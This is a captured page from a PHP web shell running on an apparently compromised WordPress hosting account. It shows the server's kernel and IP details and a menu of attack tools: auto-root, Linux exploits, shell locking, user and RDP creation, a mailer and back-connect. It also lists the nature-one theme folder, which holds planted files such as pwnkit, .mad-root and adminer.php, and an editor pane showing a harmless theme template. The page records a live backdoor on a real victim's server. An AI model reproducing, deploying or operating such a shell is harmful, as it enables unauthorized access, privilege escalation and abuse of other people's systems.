Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
nature-one /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
799
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
868
B
-rw-r--r--
category.php
1019
B
-rw-r--r--
change_log.txt
574
B
-rw-r--r--
comments.php
3.06
KB
-rw-r--r--
content-home.php
987
B
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
610
B
-rw-r--r--
content-single.php
1.6
KB
-rw-r--r--
content.php
4.01
KB
-rw-r--r--
editor-style.css
139
B
-rw-r--r--
footer.php
3
KB
-rw-r--r--
functions.php
11
KB
-rw-r--r--
functionsbak.php
10.51
KB
-rw-r--r--
header.php
6.17
KB
-rw-r--r--
image.php
3.81
KB
-rw-r--r--
index.php
15.05
KB
-rw-r--r--
license.txt
34.32
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
997
B
-rw-r--r--
options.php
28.4
KB
-rw-r--r--
page.php
1.96
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.12
KB
-rw-r--r--
screenshot.png
626.52
KB
-rw-r--r--
search.php
976
B
-rw-r--r--
searchform.php
678
B
-rw-r--r--
sidebar-page.php
422
B
-rw-r--r--
sidebar.php
1.03
KB
-rw-r--r--
single.php
871
B
-rw-r--r--
style.css
31.25
KB
-rw-r--r--
template-blog-post.php
1.05
KB
-rw-r--r--
template-full-width.php
1.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : content.php
<?php /** * @package SKT Nature One */ ?> <div class="blog-post-repeat"> <article id="post-<?php the_ID(); ?>" <?php post_class(); ?>> <header class="entry-header" style="margin-bottom:0"> <h2 class="blog-title"><a href="<?php the_permalink(); ?>" rel="bookmark"><?php the_title(); ?></a></h2> <?php if ( 'post' == get_post_type() ) : ?> <div class="postmeta"> <div class="post-date"><?php echo get_the_date(); ?></div><!-- post-date --> <div class="post-comment"> | <a href="<?php comments_link(); ?>"><?php comments_number(); ?></a></div> <div class="post-categories"> | <?php echo skt_natureone_getPostCategories();?></div> <div class="clear"></div> </div><!-- postmeta --> <?php endif; ?> <?php if ( is_search() || !is_single() ) : // Only display Excerpts for Search ?> <?php $thumb_id = get_post_thumbnail_id(); $thumb_url = wp_get_attachment_image_src($thumb_id,'thumbnail-size', true); ?> <div class="post-thumb"><img src="<?php echo $thumb_url[0]; ?>" class="alignleft" /> <?php else : ?> <div class="post-thumb"><?php the_post_thumbnail(); ?> <?php endif; ?> </div><!-- post-thumb --> </header><!-- .entry-header --> <?php if ( is_search() || !is_single() ) : // Only display Excerpts for Search ?> <div class="entry-summary"> <?php echo skt_natureone_content(40); ?> <a class="read-more" href="<?php the_permalink(); ?>"><?php _e('Read More »','nature-one'); ?></a> </div><!-- .entry-summary --> <?php else : ?> <div class="entry-content"> <?php the_content( __( 'Continue reading <span class="meta-nav">→</span>', 'nature-one' ) ); ?> <?php wp_link_pages( array( 'before' => '<div class="page-links">' . __( 'Pages:', 'nature-one' ), 'after' => '</div>', ) ); ?> </div><!-- .entry-content --> <?php endif; ?> <footer class="entry-meta" style="display:none;"> <?php if ( 'post' == get_post_type() ) : // Hide category and tag text for pages on Search ?> <?php /* translators: used between list items, there is a space after the comma */ $categories_list = get_the_category_list( __( ', ', 'nature-one' ) ); if ( $categories_list && skt_natureone_categorized_blog() ) : ?> <span class="cat-links"> <?php printf( __( 'Posted in %1$s', 'nature-one' ), $categories_list ); ?> </span> <?php endif; // End if categories ?> <?php /* translators: used between list items, there is a space after the comma */ $tags_list = get_the_tag_list( '', __( ', ', 'nature-one' ) ); if ( $tags_list ) : ?> <span class="tags-links"> <?php printf( __( 'Tagged %1$s', 'nature-one' ), $tags_list ); ?> </span> <?php endif; // End if $tags_list ?> <?php endif; // End if 'post' == get_post_type() ?> <?php if ( ! post_password_required() && ( comments_open() || '0' != get_comments_number() ) ) : ?> <span class="comments-link"><?php comments_popup_link( __( 'Leave a comment', 'nature-one' ), __( '1 Comment', 'nature-one' ), __( '% Comments', 'nature-one' ) ); ?></span> <?php endif; ?> <?php edit_post_link( __( 'Edit', 'nature-one' ), '<span class="edit-link">', '</span>' ); ?> </footer><!-- .entry-meta --> </article><!-- #post-## --> <div class="spacer20"></div> </div><!-- blog-post-repeat -->
Close